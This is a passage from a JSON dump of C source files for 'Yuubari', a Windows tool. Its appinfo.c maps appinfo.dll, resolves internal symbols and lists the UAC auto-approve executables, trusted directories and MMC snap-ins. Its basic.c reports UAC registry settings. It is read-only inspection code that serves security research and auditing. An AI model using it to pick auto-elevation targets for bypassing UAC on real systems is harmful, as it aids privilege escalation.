"content": "\n\n \n \n {4FC737F1-C7A5-4376-A066-2A32D752A2FF}\n cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx\n \n \n {93995380-89BD-4b04-88EB-625FBE52EBFB}\n h;hh;hpp;hxx;hm;inl;inc;xsd\n \n \n {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}\n rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms\n \n \n {336547cc-9eeb-4b6e-affd-aa70e6f7bfba}\n \n \n {c345b77b-4418-4498-8377-bcbbbc11aa76}\n \n \n {feac226e-813e-438e-a68d-49e68ad8f8bb}\n \n \n \n \n Source Files\n \n \n Source Files\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n Source Files\n \n \n Source Files\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n Source Files\n \n \n Source Files\n \n \n Source Files\n \n \n minirtl\n \n \n minirtl\n \n \n Source Files\n \n \n testunits\n \n \n minirtl\n \n \n hde\n \n \n minirtl\n \n \n minirtl\n \n \n \n \n Header Files\n \n \n Header Files\n \n \n Header Files\n \n \n Header Files\n \n \n Header Files\n \n \n Header Files\n \n \n Header Files\n \n \n Header Files\n \n \n Header Files\n \n \n Header Files\n \n \n minirtl\n \n \n Header Files\n \n \n Header Files\n \n \n testunits\n \n \n Header Files\n \n \n minirtl\n \n \n hde\n \n \n hde\n \n \n hde\n \n \n \n \n Resource Files\n \n \n \n \n Resource Files\n \n \n"
},
{
"path": "Source/Yuubari/Yuubari.vcxproj.user",
"content": "\n\n \n \n \n WindowsLocalDebugger\n \n \n \n \n WindowsLocalDebugger\n \n \n \n \n WindowsLocalDebugger\n \n"
},
{
"path": "Source/Yuubari/appinfo.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2014 - 2025\n*\n* TITLE: APPINFO.C\n*\n* VERSION: 1.60\n*\n* DATE: 17 Jun 2025\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n#pragma comment(lib, \"version.lib\")\n\n#define DEFAULT_SYMPATH L\"*https://msdl.microsoft.com/download/symbols\"\n\n#define TEXT_SECTION \".text\"\n#define TEXT_SECTION_LEGNTH sizeof(TEXT_SECTION)\n\n#define RDATA_SECTION \".rdata\"\n#define RDATA_SECTION_LENGTH sizeof(RDATA_SECTION)\n\n#define TestChar(x) (((WCHAR)x >= L'A') && ((WCHAR)x <= L'z')) \n\n/*\n* GetAppInfoBuildVersion\n*\n* Purpose:\n*\n* Return build number of AppInfo.\n*\n*/\nBOOL GetAppInfoBuildVersion(\n _In_ LPWSTR lpFileName,\n _Out_ ULONG* BuildNumber\n)\n{\n BOOL bResult = FALSE;\n DWORD dwHandle, dwSize;\n PVOID vinfo = NULL;\n UINT Length;\n VS_FIXEDFILEINFO* pFileInfo;\n\n *BuildNumber = 0;\n\n dwHandle = 0;\n dwSize = GetFileVersionInfoSize(lpFileName, &dwHandle);\n if (dwSize) {\n vinfo = supHeapAlloc(dwSize);\n if (vinfo) {\n if (GetFileVersionInfo(lpFileName, 0, dwSize, vinfo)) {\n bResult = VerQueryValue(vinfo, TEXT(\"\\\\\"), (LPVOID*)&pFileInfo, (PUINT)&Length);\n if (bResult) {\n *BuildNumber = HIWORD(pFileInfo->dwFileVersionLS);\n }\n }\n supHeapFree(vinfo);\n }\n }\n return bResult;\n}\n\n/*\n* LookupAddressBySymbol\n*\n* Purpose:\n*\n* Return address of symbol by name.\n*\n*/\nULONG64 LookupAddressBySymbol(\n _In_ pfnSymFromNameW SymFromName,\n _In_ LPCWSTR SymbolName,\n _Out_opt_ PBOOL Status\n)\n{\n BOOL bStatus = FALSE;\n SIZE_T symSize;\n ULONG64 symAddress = 0;\n PSYMBOL_INFOW symbolInfo = NULL;\n\n symSize = sizeof(SYMBOL_INFOW);\n\n symbolInfo = (PSYMBOL_INFOW)supHeapAlloc(symSize);\n if (symbolInfo) {\n\n symbolInfo->SizeOfStruct = sizeof(SYMBOL_INFOW);\n symbolInfo->MaxNameLen = 0; //name is not used\n\n bStatus = SymFromName(\n GetCurrentProcess(),\n SymbolName,\n symbolInfo);\n\n if (bStatus)\n symAddress = symbolInfo->Address;\n\n supHeapFree(symbolInfo);\n }\n\n if (Status)\n *Status = bStatus;\n\n return symAddress;\n}\n\n/*\n* ResolveAppInfoSymbols\n*\n* Purpose:\n*\n* Load dbghelp, resolve appinfo pointers through symbols lookup.\n*\n*/\nBOOL ResolveAppInfoSymbols(\n _In_ PUAC_AI_GLOBALS AppInfo\n)\n{\n SIZE_T dirLength;\n WCHAR szBuffer[MAX_PATH * 2];\n WCHAR szUserSearchPath[MAX_PATH * 2];\n\n HANDLE dllHandle;\n HANDLE processHandle = GetCurrentProcess();\n DWORD64 baseOfDll;\n\n pfnSymInitializeW pSymInitialize;\n pfnSymSetOptions pSymSetOptions;\n pfnSymLoadModuleExW pSymLoadModuleEx;\n pfnSymFromNameW pSymFromName;\n pfnSymUnloadModule64 pSymUnloadModule64;\n pfnSymCleanup pSymCleanup;\n\n\n RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));\n if (GetModuleFileName(NULL, szBuffer, MAX_PATH) == 0)\n return FALSE;\n\n _filepath(szBuffer, szBuffer);\n _strcat(szBuffer, TEXT(\"symdll\\\\\"));\n dirLength = _strlen(szBuffer);\n _strcat(szBuffer, TEXT(\"dbghelp.dll\"));\n dllHandle = LoadLibrary(szBuffer);\n if (dllHandle == NULL)\n return FALSE;\n\n /*szBuffer[dirLength] = 0;\n _strcat(szBuffer, TEXT(\"symsrv.dll\"));\n LoadLibrary(szBuffer);*/\n\n pSymInitialize = (pfnSymInitializeW)GetProcAddress(dllHandle, \"SymInitializeW\");\n if (pSymInitialize == NULL)\n return FALSE;\n\n pSymSetOptions = (pfnSymSetOptions)GetProcAddress(dllHandle, \"SymSetOptions\");\n if (pSymSetOptions == NULL)\n return FALSE;\n\n pSymLoadModuleEx = (pfnSymLoadModuleExW)GetProcAddress(dllHandle, \"SymLoadModuleExW\");\n if (pSymLoadModuleEx == NULL)\n return FALSE;\n\n pSymFromName = (pfnSymFromNameW)GetProcAddress(dllHandle, \"SymFromNameW\");\n if (pSymFromName == NULL)\n return FALSE;\n\n pSymUnloadModule64 = (pfnSymUnloadModule64)GetProcAddress(dllHandle, \"SymUnloadModule64\");\n if (pSymUnloadModule64 == NULL)\n return FALSE;\n\n pSymCleanup = (pfnSymCleanup)GetProcAddress(dllHandle, \"SymCleanup\");\n if (pSymCleanup == NULL)\n return FALSE;\n\n pSymSetOptions(SYMOPT_DEFERRED_LOADS | SYMOPT_UNDNAME);\n\n szBuffer[dirLength] = 0;\n _strcat(szBuffer, TEXT(\"Symbols\"));\n if (!CreateDirectory((LPCWSTR)&szBuffer, NULL))\n if (GetLastError() != ERROR_ALREADY_EXISTS)\n return FALSE;\n\n _strcpy(szUserSearchPath, TEXT(\"SRV*\"));\n _strcat(szUserSearchPath, szBuffer);\n _strcat(szUserSearchPath, DEFAULT_SYMPATH);\n\n processHandle = GetCurrentProcess();\n\n if (pSymInitialize(processHandle, szUserSearchPath, FALSE)) {\n\n baseOfDll = pSymLoadModuleEx(processHandle,\n NULL,\n TEXT(\"appinfo.dll\"),\n NULL,\n (DWORD64)AppInfo->DllBase,\n 0,\n NULL,\n 0);\n\n if (baseOfDll) {\n AppInfo->lpAutoApproveEXEList = (PVOID*)LookupAddressBySymbol(pSymFromName, TEXT(\"g_lpAutoApproveEXEList\"), NULL);\n AppInfo->lpIncludedPFDirs = (PVOID*)LookupAddressBySymbol(pSymFromName, TEXT(\"g_lpIncludedPFDirs\"), NULL);\n AppInfo->lpIncludedWindowsDirs = (PVOID*)LookupAddressBySymbol(pSymFromName, TEXT(\"g_lpIncludedWindowsDirs\"), NULL);\n AppInfo->lpIncludedSystemDirs = (PVOID*)LookupAddressBySymbol(pSymFromName, TEXT(\"g_lpIncludedSystemDirs\"), NULL);\n AppInfo->lpExemptedAutoApproveExes = (PVOID*)LookupAddressBySymbol(pSymFromName, TEXT(\"g_lpExemptedAutoApproveExes\"), NULL);\n AppInfo->lpExcludedWindowsDirs = (PVOID*)LookupAddressBySymbol(pSymFromName, TEXT(\"g_lpExcludedWindowsDirs\"), NULL);\n AppInfo->lpAutoApproveEXEList = (PVOID*)LookupAddressBySymbol(pSymFromName, TEXT(\"g_lpAutoApproveEXEList\"), NULL);\n\n pSymUnloadModule64(processHandle, baseOfDll);\n pSymCleanup(processHandle);\n\n return TRUE;\n }\n\n }\n\n return FALSE;\n}\n\nPVOID AipFindMSBlockInSection(\n _In_ PVOID DllBase,\n _In_ IMAGE_SECTION_HEADER* SectionTableEntry,\n _In_ ULONG_PTR PatternValue\n)\n{\n PBYTE SectionBase;\n ULONG SectionSize, Offset;\n\n ULONG_PTR TestValue;\n PVOID RefPointer = NULL, pvMmcBlock = NULL;\n\n SectionBase = (PBYTE)RtlOffsetToPointer(DllBase, SectionTableEntry->VirtualAddress);\n SectionSize = SectionTableEntry->Misc.VirtualSize;\n\n for (Offset = 0; Offset < SectionSize - sizeof(ULONG_PTR); Offset++) {\n\n RefPointer = SectionBase + Offset;\n TestValue = *(PULONG_PTR)RefPointer;\n if (TestValue == PatternValue) {\n pvMmcBlock = (PVOID)RefPointer;\n break;\n }\n }\n\n return pvMmcBlock;\n}\n\n/*\n* AipQueryMSBlock\n*\n* Purpose:\n*\n* Locate mmc block.\n*\n*/\nBOOLEAN AipQueryMSBlock(\n _In_ UAC_AI_GLOBALS* AppInfo\n)\n{\n ULONG i;\n ULONG SectionSize;\n ULONG_PTR PatternValue = 0;\n PVOID pvMmcBlock = NULL;\n PBYTE SectionBase;\n IMAGE_NT_HEADERS* NtHeaders = RtlImageNtHeader(AppInfo->DllBase);\n IMAGE_SECTION_HEADER* SectionTableEntry, * RDataTableEntry = NULL;\n\n WCHAR szSignature[] = L\"mmc.exe\";\n\n SectionTableEntry = IMAGE_FIRST_SECTION(NtHeaders);\n\n for (i = 0; i < NtHeaders->FileHeader.NumberOfSections; i++, SectionTableEntry++) {\n\n SectionBase = (PBYTE)RtlOffsetToPointer(AppInfo->DllBase, SectionTableEntry->VirtualAddress);\n SectionSize = SectionTableEntry->Misc.VirtualSize;\n\n PatternValue = (ULONG_PTR)supFindPattern(SectionBase,\n SectionSize,\n (CONST PBYTE)szSignature,\n sizeof(szSignature));\n\n if (PatternValue)\n break;\n }\n\n if (PatternValue == 0)\n return FALSE;\n\n SectionTableEntry = IMAGE_FIRST_SECTION(NtHeaders);\n for (i = 0; i < NtHeaders->FileHeader.NumberOfSections; i++, SectionTableEntry++) {\n if (_strncmp_a(\n (CHAR*)SectionTableEntry->Name,\n RDATA_SECTION,\n RDATA_SECTION_LENGTH) == 0)\n {\n RDataTableEntry = SectionTableEntry;\n break;\n }\n }\n\n if (RDataTableEntry) {\n\n pvMmcBlock = AipFindMSBlockInSection(AppInfo->DllBase,\n RDataTableEntry,\n PatternValue);\n\n }\n else {\n\n SectionTableEntry = IMAGE_FIRST_SECTION(NtHeaders);\n for (i = 0; i < NtHeaders->FileHeader.NumberOfSections; i++, SectionTableEntry++) {\n\n pvMmcBlock = AipFindMSBlockInSection(AppInfo->DllBase,\n SectionTableEntry,\n PatternValue);\n\n if (pvMmcBlock)\n break;\n }\n }\n\n if (pvMmcBlock) {\n AppInfo->MmcBlock = pvMmcBlock;\n return TRUE;\n }\n\n return FALSE;\n}\n\nBOOL IsCrossPtr(\n _In_ UAC_AI_GLOBALS* AppInfo,\n _In_ ULONG_PTR Ptr,\n _In_ ULONG_PTR CurrentList\n)\n{\n if (Ptr == 0 || AppInfo == NULL) {\n return TRUE;\n }\n\n if (!IN_REGION(Ptr, AppInfo->DllBase, AppInfo->DllVirtualSize)) {\n return TRUE;\n }\n\n if (AppInfo->lpAutoApproveEXEList) {\n if (CurrentList != (ULONG_PTR)AppInfo->lpAutoApproveEXEList)\n if ((ULONG_PTR)Ptr == (ULONG_PTR)AppInfo->lpAutoApproveEXEList[0])\n return TRUE;\n }\n if (AppInfo->lpExcludedWindowsDirs) {\n if (CurrentList != (ULONG_PTR)AppInfo->lpExcludedWindowsDirs)\n if ((ULONG_PTR)Ptr == (ULONG_PTR)AppInfo->lpExcludedWindowsDirs[0])\n return TRUE;\n }\n if (AppInfo->lpExemptedAutoApproveExes) {\n if (CurrentList != (ULONG_PTR)AppInfo->lpExemptedAutoApproveExes)\n if ((ULONG_PTR)Ptr == (ULONG_PTR)AppInfo->lpExemptedAutoApproveExes[0])\n return TRUE;\n }\n if (AppInfo->lpIncludedPFDirs) {\n if (CurrentList != (ULONG_PTR)AppInfo->lpIncludedPFDirs)\n if ((ULONG_PTR)Ptr == (ULONG_PTR)AppInfo->lpIncludedPFDirs[0])\n return TRUE;\n }\n if (AppInfo->lpIncludedSystemDirs) {\n if (CurrentList != (ULONG_PTR)AppInfo->lpIncludedSystemDirs)\n if ((ULONG_PTR)Ptr == (ULONG_PTR)AppInfo->lpIncludedSystemDirs[0])\n return TRUE;\n }\n if (AppInfo->lpIncludedWindowsDirs) {\n if (CurrentList != (ULONG_PTR)AppInfo->lpIncludedWindowsDirs)\n if ((ULONG_PTR)Ptr == (ULONG_PTR)AppInfo->lpIncludedWindowsDirs[0])\n return TRUE;\n }\n return FALSE;\n}\n\n/*\n* ListMMCFiles\n*\n* Purpose:\n*\n* Output MMC related block from appinfo.dll.\n*\n*/\nVOID ListMMCFiles(\n _In_ UAC_AI_GLOBALS* AppInfo,\n _In_ OUTPUTCALLBACK OutputCallback\n)\n{\n SIZE_T i, Length;\n LPWSTR TestString = NULL;\n PVOID* MscArray = NULL;\n UAC_AI_DATA CallbackData;\n\n if (!AipQueryMSBlock(AppInfo))\n return;\n\n __try {\n if (AppInfo->MmcBlock->NumOfElements == 0 ||\n AppInfo->MmcBlock->NumOfElements > 256) {\n OutputDebugString(TEXT(\"Invalid block data\"));\n }\n else {\n CallbackData.Type = AiManagementConsole;\n TestString = AppInfo->MmcBlock->lpManagementApplication;\n if (TestString) {\n if (IN_REGION(TestString, AppInfo->DllBase, AppInfo->DllVirtualSize)) {\n CallbackData.Name = TestString;\n CallbackData.Length = _strlen(TestString);\n OutputCallback((PVOID)&CallbackData);\n }\n }\n CallbackData.Type = AiSnapinFile;\n MscArray = (PVOID*)AppInfo->MmcBlock->Base;\n for (i = 0; i < AppInfo->MmcBlock->NumOfElements; i++) {\n TestString = (LPWSTR)MscArray[i];\n if (TestString != NULL) {\n if (IN_REGION(TestString, AppInfo->DllBase, AppInfo->DllVirtualSize)) {\n Length = _strlen(TestString);\n CallbackData.Name = TestString;\n CallbackData.Length = Length;\n OutputCallback((PVOID)&CallbackData);\n }\n }\n }\n }\n }\n __except (EXCEPTION_EXECUTE_HANDLER) {\n OutputDebugString(TEXT(\"Invalid block\"));\n return;\n }\n}\n\n/*\n* ListAutoApproveEXE\n*\n* Purpose:\n*\n* Output lpAutoApproveEXE list from appinfo.dll.\n*\n*/\nVOID ListAutoApproveEXE(\n _In_ UAC_AI_GLOBALS* AppInfo,\n _In_ OUTPUTCALLBACK OutputCallback\n)\n{\n BOOL bValidEntry;\n WCHAR k, lk;\n SIZE_T i, Length = 0;\n LPWSTR TestString = NULL;\n UAC_AI_DATA CallbackData;\n SIZE_T MaxEntries = 100;\n\n if (AppInfo->lpAutoApproveEXEList == NULL)\n return;\n\n CallbackData.Type = AiAutoApproveEXE;\n\n i = 0;\n k = 0;\n lk = 0;\n __try {\n do {\n if (i >= MaxEntries)\n break;\n\n TestString = (LPWSTR)AppInfo->lpAutoApproveEXEList[i];\n if (IsCrossPtr(AppInfo, (ULONG_PTR)TestString, (ULONG_PTR)AppInfo->lpAutoApproveEXEList))\n break;\n\n if (!IN_REGION(TestString, AppInfo->DllBase, AppInfo->DllVirtualSize))\n break;\n\n bValidEntry = FALSE;\n __try {\n k = TestString[0];\n bValidEntry = TestChar(k);\n }\n __except (EXCEPTION_EXECUTE_HANDLER) {\n break;\n }\n\n if (!bValidEntry)\n break;\n\n if (k < lk)\n break;\n\n lk = k;\n i += 1;\n\n __try {\n Length = _strlen(TestString);\n if (Length > MAX_PATH * 2) {\n continue;\n }\n }\n __except (EXCEPTION_EXECUTE_HANDLER) {\n continue;\n }\n\n Length = _strlen(TestString);\n CallbackData.Length = Length;\n CallbackData.Name = TestString;\n OutputCallback((PVOID)&CallbackData);\n } while (1);\n }\n __except (EXCEPTION_EXECUTE_HANDLER) {\n OutputDebugString(TEXT(\"Invalid pointer, enum stop\"));\n return;\n }\n}\n\n/*\n* ListStringDataUnsorted\n*\n* Purpose:\n*\n* Output unsorted string data from appinfo.dll.\n*\n*/\nVOID ListStringDataUnsorted(\n UAC_AI_GLOBALS* AppInfo,\n AI_DATA_TYPE AiDataType,\n PVOID* Data,\n OUTPUTCALLBACK OutputCallback\n)\n{\n BOOL bValidEntry = FALSE;\n SIZE_T i, Length = 0, MaxEntries = 100;\n LPWSTR TestString = NULL;\n UAC_AI_DATA CallbackData;\n\n if (Data == NULL)\n return;\n\n CallbackData.Type = AiDataType;\n\n i = 0;\n\n __try {\n do {\n if (i >= MaxEntries)\n break;\n\n TestString = (LPWSTR)Data[i];\n if (IsCrossPtr(AppInfo, (ULONG_PTR)TestString, (ULONG_PTR)Data))\n break;\n\n if (!IN_REGION(TestString, AppInfo->DllBase, AppInfo->DllVirtualSize))\n break;\n\n bValidEntry = FALSE;\n __try {\n bValidEntry = TestChar(TestString[0]);\n }\n __except (EXCEPTION_EXECUTE_HANDLER) {\n break;\n }\n\n if (!bValidEntry)\n break;\n\n i += 1;\n\n __try {\n Length = _strlen(TestString);\n if (Length > MAX_PATH * 2) {\n continue;\n }\n }\n __except (EXCEPTION_EXECUTE_HANDLER) {\n continue;\n }\n\n Length = _strlen(TestString);\n CallbackData.Length = Length;\n CallbackData.Name = TestString;\n OutputCallback((PVOID)&CallbackData);\n } while (1);\n }\n __except (EXCEPTION_EXECUTE_HANDLER) {\n OutputDebugString(TEXT(\"Invalid pointer, enum stop\"));\n return;\n }\n}\n\n/*\n* ScanAppInfo\n*\n* Purpose:\n*\n* Map appinfo.dll and extract various information from it.\n*\n*/\nVOID ScanAppInfo(\n LPWSTR lpFileName,\n OUTPUTCALLBACK OutputCallback\n)\n{\n NTSTATUS status;\n HANDLE hFile = NULL, hSection = NULL;\n PBYTE DllBase = NULL;\n SIZE_T DllVirtualSize;\n OBJECT_ATTRIBUTES attr;\n UNICODE_STRING usFileName;\n IO_STATUS_BLOCK iosb;\n UAC_AI_GLOBALS AppInfo;\n\n RtlSecureZeroMemory(&AppInfo, sizeof(AppInfo));\n RtlInitEmptyUnicodeString(&usFileName, NULL, 0);\n\n do {\n\n //\n // Due to brilliant MS design all newest versions has the same build in file version attributes.\n //\n if (g_NtBuildNumber >= NT_WIN10_19H1) {\n AppInfo.AppInfoBuildNumber = g_NtBuildNumber;\n }\n else {\n if (!GetAppInfoBuildVersion(lpFileName, &AppInfo.AppInfoBuildNumber))\n break;\n }\n\n if (RtlDosPathNameToNtPathName_U(lpFileName, &usFileName, NULL, NULL) == FALSE)\n break;\n\n InitializeObjectAttributes(&attr, &usFileName, OBJ_CASE_INSENSITIVE, NULL, NULL);\n RtlSecureZeroMemory(&iosb, sizeof(iosb));\n\n status = NtCreateFile(&hFile,\n SYNCHRONIZE | FILE_READ_DATA,\n &attr,\n &iosb,\n NULL,\n 0,\n FILE_SHARE_READ,\n FILE_OPEN,\n FILE_SYNCHRONOUS_IO_NONALERT,\n NULL,\n 0);\n\n if (!NT_SUCCESS(status))\n break;\n\n status = NtCreateSection(&hSection,\n SECTION_ALL_ACCESS,\n NULL,\n NULL,\n PAGE_READONLY,\n SEC_IMAGE,\n hFile);\n\n if (!NT_SUCCESS(status))\n break;\n\n DllBase = NULL;\n DllVirtualSize = 0;\n\n status = NtMapViewOfSection(hSection,\n NtCurrentProcess(),\n (PVOID*)&DllBase,\n 0,\n 0,\n NULL,\n &DllVirtualSize,\n ViewUnmap,\n 0,\n PAGE_READONLY);\n\n if (!NT_SUCCESS(status))\n break;\n\n AppInfo.DllBase = DllBase;\n AppInfo.DllVirtualSize = DllVirtualSize;\n\n ListMMCFiles(&AppInfo, OutputCallback);\n\n if (ResolveAppInfoSymbols(&AppInfo)) {\n ListAutoApproveEXE(&AppInfo, OutputCallback);\n ListStringDataUnsorted(&AppInfo, AiIncludedPFDirs, AppInfo.lpIncludedPFDirs, OutputCallback);\n ListStringDataUnsorted(&AppInfo, AilpIncludedWindowsDirs, AppInfo.lpIncludedWindowsDirs, OutputCallback);\n ListStringDataUnsorted(&AppInfo, AiIncludedSystemDirs, AppInfo.lpIncludedSystemDirs, OutputCallback);\n ListStringDataUnsorted(&AppInfo, AiExemptedAutoApproveExes, AppInfo.lpExemptedAutoApproveExes, OutputCallback);\n ListStringDataUnsorted(&AppInfo, AiExcludedWindowsDirs, AppInfo.lpExcludedWindowsDirs, OutputCallback);\n }\n\n } while (FALSE);\n\n if (usFileName.Buffer != NULL)\n RtlFreeUnicodeString(&usFileName);\n\n if (DllBase != NULL)\n NtUnmapViewOfSection(NtCurrentProcess(), DllBase);\n\n if (hSection != NULL)\n NtClose(hSection);\n\n if (hFile != NULL)\n NtClose(hFile);\n}\n"
},
{
"path": "Source/Yuubari/appinfo.h",
"content": "#/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2014 - 2022\n*\n* TITLE: APPINFO.H\n*\n* VERSION: 1.54\n*\n* DATE: 01 Dec 2022\n*\n* Header file for the AppInfo scan.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n#include \n\ntypedef enum _AI_DATA_TYPE {\n AiSnapinFile = 1,\n AiManagementConsole,\n AiAutoApproveEXE,\n AiIncludedPFDirs,\n AiIncludedSystemDirs,\n AilpIncludedWindowsDirs,\n AiExemptedAutoApproveExes,\n AiExcludedWindowsDirs,\n AiMax\n} AI_DATA_TYPE;\n\ntypedef struct _UAC_AI_DATA {\n LPWSTR Name;\n SIZE_T Length;\n AI_DATA_TYPE Type;\n} UAC_AI_DATA, *PUAC_AI_DATA;\n\ntypedef struct _UAC_MMC_BLOCK {\n LPWSTR lpManagementApplication;\n PVOID Base;\n ULONG NumOfElements;\n ULONG Reserved;\n} UAC_MMC_BLOCK, *PUAC_MMC_BLOCK;\n\ntypedef struct _UAC_AI_GLOBALS {\n ULONG AppInfoBuildNumber;\n PVOID DllBase;\n SIZE_T DllVirtualSize;\n UAC_MMC_BLOCK *MmcBlock;\n PVOID *lpIncludedWindowsDirs;\n PVOID *lpIncludedPFDirs;\n PVOID *lpAutoApproveEXEList;\n PVOID *lpIncludedSystemDirs;\n PVOID *lpExemptedAutoApproveExes;\n PVOID *lpExcludedWindowsDirs;\n} UAC_AI_GLOBALS, *PUAC_AI_GLOBALS;\n\ntypedef DWORD(WINAPI *pfnSymSetOptions)(\n _In_ DWORD SymOptions);\n\ntypedef BOOL(WINAPI *pfnSymInitializeW)(\n _In_ HANDLE hProcess,\n _In_opt_ PCWSTR UserSearchPath,\n _In_ BOOL fInvadeProcess);\n\ntypedef BOOL(WINAPI* pfnSymFromNameW)(\n _In_ HANDLE hProcess,\n _In_ PCWSTR Name,\n _Inout_ PSYMBOL_INFOW Symbol);\n\ntypedef DWORD64(WINAPI *pfnSymLoadModuleExW)(\n _In_ HANDLE hProcess,\n _In_opt_ HANDLE hFile,\n _In_opt_ PCWSTR ImageName,\n _In_opt_ PCWSTR ModuleName,\n _In_ DWORD64 BaseOfDll,\n _In_ DWORD DllSize,\n _In_opt_ PMODLOAD_DATA Data,\n _In_ DWORD Flags);\n\ntypedef BOOL(WINAPI *pfnSymUnloadModule64)(\n _In_ HANDLE hProcess,\n _In_ DWORD64 BaseOfDll);\n\ntypedef BOOL(WINAPI *pfnSymCleanup)(\n _In_ HANDLE hProcess);\n\nVOID ScanAppInfo(\n LPWSTR lpFileName,\n OUTPUTCALLBACK OutputCallback);\n"
},
{
"path": "Source/Yuubari/basic.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2014 - 2025\n*\n* TITLE: BASIC.C\n*\n* VERSION: 1.60\n*\n* DATE: 17 Jun 2025\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n\nVOID QueryAndOutputRegValue(\n _In_ OUTPUTCALLBACK OutputCallback,\n _In_ HKEY hKey,\n _In_ LPWSTR ValueName,\n _In_ LPWSTR DisplayName,\n _In_ BOOL IsBool\n)\n{\n UAC_BASIC_DATA TempData;\n ULONG Value = 0;\n LRESULT Result = supRegReadDword(hKey, ValueName, &Value);\n if (Result == ERROR_SUCCESS) {\n RtlSecureZeroMemory(&TempData, sizeof(TempData));\n TempData.Name = DisplayName;\n TempData.IsValueBool = IsBool;\n TempData.Value = Value;\n OutputCallback((PVOID)&TempData);\n }\n}\n\n/*\n* ScanBasicUacData\n*\n* Purpose:\n*\n* Query UserSharedData flags, UAC registry values.\n*\n*/\nVOID ScanBasicUacData(\n _In_ OUTPUTCALLBACK OutputCallback\n)\n{\n ULONG Flags = 0;\n LRESULT lRet;\n HKEY hKey = NULL;\n\n UAC_BASIC_DATA Data;\n\n if (OutputCallback == NULL)\n return;\n\n if (!NT_SUCCESS(RtlQueryElevationFlags(&Flags)))\n return;\n\n RtlSecureZeroMemory(&Data, sizeof(Data));\n\n Data.Name = T_FLAG_ELEVATION_ENABLED;\n Data.IsValueBool = TRUE;\n Data.Value = ((Flags & DBG_FLAG_ELEVATION_ENABLED) > 0);\n OutputCallback((PVOID)&Data);\n\n Data.Name = T_FLAG_VIRTUALIZATION_ENABLED;\n Data.IsValueBool = TRUE;\n Data.Value = ((Flags & DBG_FLAG_VIRTUALIZATION_ENABLED) > 0);\n OutputCallback((PVOID)&Data);\n\n Data.Name = T_FLAG_INSTALLERDETECT_ENABLED;\n Data.IsValueBool = TRUE;\n Data.Value = ((Flags & DBG_FLAG_INSTALLER_DETECT_ENABLED) > 0);\n OutputCallback((PVOID)&Data);\n\n lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, T_UAC_SETTINGS_KEY, 0, KEY_READ, &hKey);\n if (lRet == ERROR_SUCCESS && hKey != NULL) {\n QueryAndOutputRegValue(OutputCallback, hKey, T_UAC_PROMPT_BEHAVIOR, T_UAC_PROMPT_BEHAVIOR, FALSE);\n QueryAndOutputRegValue(OutputCallback, hKey, T_UAC_RESTRICTED_AUTOAPPROVE, T_UAC_RESTRICTED_AUTOAPPROVE, FALSE);\n QueryAndOutputRegValue(OutputCallback, hKey, T_UAC_AUTOAPPROVEIC, T_UAC_AUTOAPPROVEIC, FALSE);\n QueryAndOutputRegValue(OutputCallback, hKey, T_UAC_AUTOAPPROVEMP, T_UAC_AUTOAPPROVEMP, FALSE);\n QueryAndOutputRegValue(OutputCallback, hKey, T_UAC_AUTOAPPROVEHARDCLAIMS, T_UAC_AUTOAPPROVEHARDCLAIMS, FALSE);\n QueryAndOutputRegValue(OutputCallback, hKey, T_UAC_ENABLESECUREUIPATHS, T_UAC_ENABLESECUREUIPATHS, FALSE);\n QueryAndOutputRegValue(OutputCallback, hKey, T_UAC_SECURE_DESKTOP, T_UAC_SECURE_DESKTOP, TRUE);\n RegCloseKey(hKey);\n }\n}\n"
},
{
"path": "Source/Yuubari/basic.h",
"content": "#/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2014 - 2020\n*\n* TITLE: BASIC.H\n*\n* VERSION: 1.49\n*\n* DATE: 11 Nov 2019\n*\n* Header file for the basic UAC info scan.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\ntypedef struct _UAC_BASIC_DATA {\n LPWSTR Name;\n DWORD Value;\n BOOL IsValueBool;\n} UAC_BASIC_DATA, *PUAC_BASIC_DATA;\n\nVOID ScanBasicUacData(\n _In_ OUTPUTCALLBACK OutputCallback);\n"
},
{
"path": "Source/Yuubari/comobj.c",
